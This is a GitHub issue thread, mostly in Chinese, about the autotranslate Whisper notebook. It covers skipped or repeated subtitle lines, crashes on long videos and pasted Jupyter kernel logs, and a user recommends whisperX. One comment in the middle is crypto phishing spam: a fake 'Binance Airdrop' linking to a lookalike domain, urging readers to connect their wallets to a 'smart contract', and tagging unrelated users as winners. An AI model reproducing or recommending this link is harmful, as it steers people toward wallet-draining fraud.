### ISSUE TITLE
请求修复两个问题

### ISSUE THREAD

**Issue by ads233** [lewangdev/autotranslate#14]
第一个问题：部分视频提取字幕时经常出现跳过很多对话的情况，尤其是直播类的视频经常会有这个问题出现。
YouTube测试链接：https://www.youtube.com/watch?v=ED6-Ba6uQJE&t=151s
![1](https://github.com/lewangdev/autotranslate/assets/153071412/c1e8e8db-747e-4b68-b0c6-71a7c6e08899)
无论我选择的是V3还是V2模型来跑都会有这样的问题
![2](https://github.com/lewangdev/autotranslate/assets/153071412/ece434df-d8b2-4130-b49a-25194b14fd3f)
第二个问题：如果需要处理的视频时间长度比较长的话会导致虚拟机直接死机，导致所有数据都清空了。
YouTube测试链接：https://www.youtube.com/watch?v=05HDAweLW4M
![3](https://github.com/lewangdev/autotranslate/assets/153071412/c098b464-9d0c-4ef8-8586-35b11835bff5)
以上问题在使用另一个类型的notebook时没有这类问题产生，所以希望作者能修复一下。
另一个类型的notebook测试地址  https://github.com/Ayanaminn/N46Whisper

**Comment by lewangdev** [comment]
1. 第一个问题是 whisper 模型幻觉的问题，在没有人声的片段会出现，在脚本中有个 vad 检测功能，开启之后会改善幻觉的问题。
2. 等我有空再看看

谢谢反馈问题。

**Comment by lewangdev** [comment]
在这里启用 VAD

<img width="683" alt="image" src="https://github.com/lewangdev/autotranslate/assets/1455685/ecaaf96b-4dd4-40d3-95e8-537cf2851ae5">

**Comment by lewangdev** [comment]
能否把「运行日志」copy 出来给我看看，视频太长了，我测试不是很有效率
<img width="503" alt="image" src="https://github.com/lewangdev/autotranslate/assets/1455685/e01bfc74-b011-4ac1-85d7-ff03d2037739">

**Comment by ads233** [comment]
哦，等一下

**Comment by ads233** [comment]
Timestamp,Level,Message
"Dec 25, 2023, 5:50:38 PM",WARNING,WARNING:root:kernel c97a1d16-0aa7-465c-9220-e98054b9c9a3 restarted
"Dec 25, 2023, 5:50:38 PM",INFO,"KernelRestarter: restarting kernel (1/5), keep random ports"
"Dec 25, 2023, 5:43:32 PM",INFO,"Kernel started: c97a1d16-0aa7-465c-9220-e98054b9c9a3, name: python3"
"Dec 25, 2023, 5:43:29 PM",INFO,Use Control-C to stop this server and shut down all kernels (twice to skip confirmation).
"Dec 25, 2023, 5:43:29 PM",INFO,http://172.28.0.12:9000/
"Dec 25, 2023, 5:43:29 PM",INFO,Jupyter Notebook 6.5.5 is running at:
"Dec 25, 2023, 5:43:29 PM",INFO,Serving notebooks from local directory: /
"Dec 25, 2023, 5:43:29 PM",INFO,Use Control-C to stop this server and shut down all kernels (twice to skip confirmation).
"Dec 25, 2023, 5:43:29 PM",INFO,http://172.28.0.2:9000/
"Dec 25, 2023, 5:43:29 PM",INFO,Jupyter Notebook 6.5.5 is running at:
"Dec 25, 2023, 5:43:29 PM",INFO,Serving notebooks from local directory: /
"Dec 25, 2023, 5:43:26 PM",INFO,google.colab serverextension initialized.
"Dec 25, 2023, 5:43:26 PM",INFO,"Authentication of /metrics is OFF, since other authentication is disabled."
"Dec 25, 2023, 5:43:26 PM",INFO,Writing notebook server cookie secret to /root/.local/share/jupyter/runtime/notebook_cookie_secret
"Dec 25, 2023, 5:43:26 PM",WARNING,    	/root/.jupyter/jupyter_notebook_config.json
"Dec 25, 2023, 5:43:26 PM",WARNING,    	/root/.local/etc/jupyter/jupyter_notebook_config.json
"Dec 25, 2023, 5:43:26 PM",WARNING,    	/usr/etc/jupyter/jupyter_notebook_config.json
"Dec 25, 2023, 5:43:26 PM",WARNING,    	/usr/local/etc/jupyter/jupyter_notebook_config.json
"Dec 25, 2023, 5:43:26 PM",WARNING,    	/usr/local/etc/jupyter/jupyter_notebook_config.d/panel-client-jupyter.json
"Dec 25, 2023, 5:43:26 PM",WARNING,    	/etc/jupyter/jupyter_notebook_config.json
"Dec 25, 2023, 5:43:26 PM",INFO,google.colab serverextension initialized.
"Dec 25, 2023, 5:43:25 PM",INFO,"Authentication of /metrics is OFF, since other authentication is disabled."
"Dec 25, 2023, 5:43:25 PM",INFO,Writing notebook server cookie secret to /root/.local/share/jupyter/runtime/notebook_cookie_secret
"Dec 25, 2023, 5:43:25 PM",WARNING,    	/root/.jupyter/jupyter_notebook_config.json
"Dec 25, 2023, 5:43:25 PM",WARNING,    	/root/.local/etc/jupyter/jupyter_notebook_config.json
"Dec 25, 2023, 5:43:25 PM",WARNING,    	/usr/etc/jupyter/jupyter_notebook_config.json
"Dec 25, 2023, 5:43:25 PM",WARNING,    	/usr/local/etc/jupyter/jupyter_notebook_config.json
"Dec 25, 2023, 5:43:25 PM",WARNING,    	/usr/local/etc/jupyter/jupyter_notebook_config.d/panel-client-jupyter.json
"Dec 25, 2023, 5:43:25 PM",WARNING,    	/etc/jupyter/jupyter_notebook_config.json
"Dec 25, 2023, 5:43:25 PM",WARNING,[D 09:43:25.584 NotebookApp] Loaded config file: /root/.jupyter/jupyter_notebook_config.py
"Dec 25, 2023, 5:43:25 PM",WARNING,[D 09:43:25.578 NotebookApp] Looking for jupyter_notebook_config in /root/.jupyter
"Dec 25, 2023, 5:43:25 PM",WARNING,[D 09:43:25.578 NotebookApp] Looking for jupyter_notebook_config in /root/.local/etc/jupyter
"Dec 25, 2023, 5:43:25 PM",WARNING,[D 09:43:25.574 NotebookApp] Looking for jupyter_notebook_config in /usr/etc/jupyter
"Dec 25, 2023, 5:43:25 PM",WARNING,[D 09:43:25.574 NotebookApp] Loaded config file: /usr/local/etc/jupyter/jupyter_notebook_config.json
"Dec 25, 2023, 5:43:25 PM",WARNING,[D 09:43:25.568 NotebookApp] Looking for jupyter_notebook_config in /usr/local/etc/jupyter
"Dec 25, 2023, 5:43:25 PM",WARNING,[D 09:43:25.567 NotebookApp] Loaded config file: /etc/jupyter/jupyter_notebook_config.py
"Dec 25, 2023, 5:43:25 PM",WARNING,[D 09:43:25.561 NotebookApp] Looking for jupyter_notebook_config in /etc/jupyter
"Dec 25, 2023, 5:43:25 PM",WARNING,[D 09:43:25.558 NotebookApp] Looking for jupyter_config in /root/.jupyter
"Dec 25, 2023, 5:43:25 PM",WARNING,[D 09:43:25.557 NotebookApp] Looking for jupyter_config in /root/.local/etc/jupyter
"Dec 25, 2023, 5:43:25 PM",WARNING,[D 09:43:25.556 NotebookApp] Looking for jupyter_config in /usr/etc/jupyter
"Dec 25, 2023, 5:43:25 PM",WARNING,[D 09:43:25.545 NotebookApp] Looking for jupyter_config in /usr/local/etc/jupyter
"Dec 25, 2023, 5:43:25 PM",WARNING,[D 09:43:25.543 NotebookApp] Looking for jupyter_config in /etc/jupyter
"Dec 25, 2023, 5:43:25 PM",WARNING,"[D 09:43:25.542 NotebookApp] Searching ['/root/.jupyter', '/root/.local/etc/jupyter', '/usr/etc/jupyter', '/usr/local/etc/jupyter', '/etc/jupyter'] for config files"
"Dec 25, 2023, 5:43:25 PM",WARNING,[D 09:43:25.494 NotebookApp] Loaded config file: /root/.jupyter/jupyter_notebook_config.py
"Dec 25, 2023, 5:43:25 PM",WARNING,[D 09:43:25.487 NotebookApp] Looking for jupyter_notebook_config in /root/.jupyter
"Dec 25, 2023, 5:43:25 PM",WARNING,[D 09:43:25.487 NotebookApp] Looking for jupyter_notebook_config in /root/.local/etc/jupyter
"Dec 25, 2023, 5:43:25 PM",WARNING,[D 09:43:25.487 NotebookApp] Looking for jupyter_notebook_config in /usr/etc/jupyter
"Dec 25, 2023, 5:43:25 PM",WARNING,[D 09:43:25.487 NotebookApp] Loaded config file: /usr/local/etc/jupyter/jupyter_notebook_config.json
"Dec 25, 2023, 5:43:25 PM",WARNING,[D 09:43:25.481 NotebookApp] Looking for jupyter_notebook_config in /usr/local/etc/jupyter
"Dec 25, 2023, 5:43:25 PM",WARNING,[D 09:43:25.481 NotebookApp] Loaded config file: /etc/jupyter/jupyter_notebook_config.py
"Dec 25, 2023, 5:43:25 PM",WARNING,[D 09:43:25.479 NotebookApp] Looking for jupyter_notebook_config in /etc/jupyter
"Dec 25, 2023, 5:43:25 PM",WARNING,[D 09:43:25.475 NotebookApp] Looking for jupyter_config in /root/.jupyter
"Dec 25, 2023, 5:43:25 PM",WARNING,[D 09:43:25.475 NotebookApp] Looking for jupyter_config in /root/.local/etc/jupyter
"Dec 25, 2023, 5:43:25 PM",WARNING,[D 09:43:25.475 NotebookApp] Looking for jupyter_config in /usr/etc/jupyter
"Dec 25, 2023, 5:43:25 PM",WARNING,[D 09:43:25.468 NotebookApp] Looking for jupyter_config in /usr/local/etc/jupyter
"Dec 25, 2023, 5:43:25 PM",WARNING,[D 09:43:25.459 NotebookApp] Looking for jupyter_config in /etc/jupyter
"Dec 25, 2023, 5:43:25 PM",WARNING,"[D 09:43:25.458 NotebookApp] Searching ['/root/.jupyter', '/root/.local/etc/jupyter', '/usr/etc/jupyter', '/usr/local/etc/jupyter', '/etc/jupyter'] for config files"

**Comment by ads233** [comment]
我测试了一段时间，又发现提取字幕时有2个问题存在
第一问题，在Run the model这一步时无论VAD filter选择50还是200都会存在跳过部分对话或者出现重复对话的情况，下面以N46Whisper和autotranslate这两款Notebook进行对比测试的差异来展示。
YouTube测试链接：https://www.youtube.com/watch？v=ED6-Ba6uQJE&t=151s
两款notebook我都选用了V3模型进行测试，图左边是N46Whisper的结果，而右边是autotranslate的结果：
![9](https://github.com/lewangdev/autotranslate/assets/153071412/0c6887f9-ede3-4544-a505-2bea27971ce6)
![10](https://github.com/lewangdev/autotranslate/assets/153071412/ff2af8c1-d4eb-418e-b5f1-2313c293e168)
另外我展示一下在选用N46Whisper的Notebook时所选用的配置：
![1](https://github.com/lewangdev/autotranslate/assets/153071412/7125295e-b629-4ca6-8722-72520b50dead)
![2](https://github.com/lewangdev/autotranslate/assets/153071412/df85fd18-3158-41ad-a738-8d6ee1cba3ba)
第二个问题，字幕经过Run this cell to merge words/segments to sentences.这一步后会让字幕排序混乱。
图片左边是Run the model的结果，而右边是Run this cell to merge words/segments to sentences后的结果：
![5](https://github.com/lewangdev/autotranslate/assets/153071412/9d833a92-1681-4504-ae1d-5303cf46e09e)

**Comment by ads233** [comment]
我今天在油管看到一个项目：whisperX，作者看看能不能运用这个项目来解决一些问题。
https://www.youtube.com/watch?v=y_ZEKm0YC70&t=305s

**Comment by Pawanpatidar99** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @manageyp, @KjetilVaa, @cjroth, @phongsathorn1, @yhuag, @LexPrime, @Slengas

**Comment by ads233** [comment]
我使用whisperX把全部问题解决了，作者如果觉得不错的话不妨考虑一下用whisperX，转录速度也比fast whisper快。
https://colab.research.google.com/drive/1FrKV1TFra5joJ8tRI8zwTTuMQGj5WugH#scrollTo=96sSsfsBkYOD

**Comment by lewangdev** [comment]
> 我使用whisperX把全部问题解决了，作者如果觉得不错的话不妨考虑一下用whisperX，转录速度也比fast whisper快。 https://colab.research.google.com/drive/1FrKV1TFra5joJ8tRI8zwTTuMQGj5WugH#scrollTo=96sSsfsBkYOD

谢谢，我有空会去看看。whisperx  也是基于 faster-whisper 的，一些参数可能设置的不太一样。
